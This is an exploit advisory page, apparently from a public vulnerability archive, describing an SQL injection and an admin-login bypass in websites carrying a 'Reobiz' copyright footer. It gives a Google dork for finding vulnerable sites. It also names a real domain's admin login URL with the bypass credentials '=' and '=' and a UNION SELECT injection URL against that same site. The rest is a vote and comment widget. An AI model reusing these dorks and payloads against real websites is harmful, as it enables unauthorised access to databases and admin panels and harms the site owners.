Copyright 2021 Reobiz. All Rights Reserved. - SQL Injection Vulnerability

2022.03.21

MR.$UD0 (PH)

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

*********************************************************
#Exploit Title: © Copyright 2021 Reobiz. All Rights Reserved. - SQL Injection Vulnerability & Bypass Admin Panel
#Date: 2022-03-20
#Exploit Author: Jayson San Buenaventura
#Google Dork:"© Copyright 2021 Reobiz. All Rights Reserved."
#Category: webapps
#Tested On: Kali Linux, CyberFox
 
 
Proof of Concept:
Search google Dork: "© Copyright 2021 Reobiz. All Rights Reserved."


### Admin :

https://www.volcano.co.th/__admin__/login.php

user: '='
pass: '='


### Demo :

https://www.volcano.co.th/view.php?id=-10'+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10--+


********************************************************* 
#Discovered by: Jayson San Buenaventura
#Facebook: Jayson Cabrillas San Buenaventura
#Email: sanbuenaventurajayson27@gmail.com
*********************************************************

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Copyright 2021 Reobiz. All Rights Reserved. - SQL Injection Vulnerability

Dork: "© Copyright 2021 Reobiz. All Rights Reserved."

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.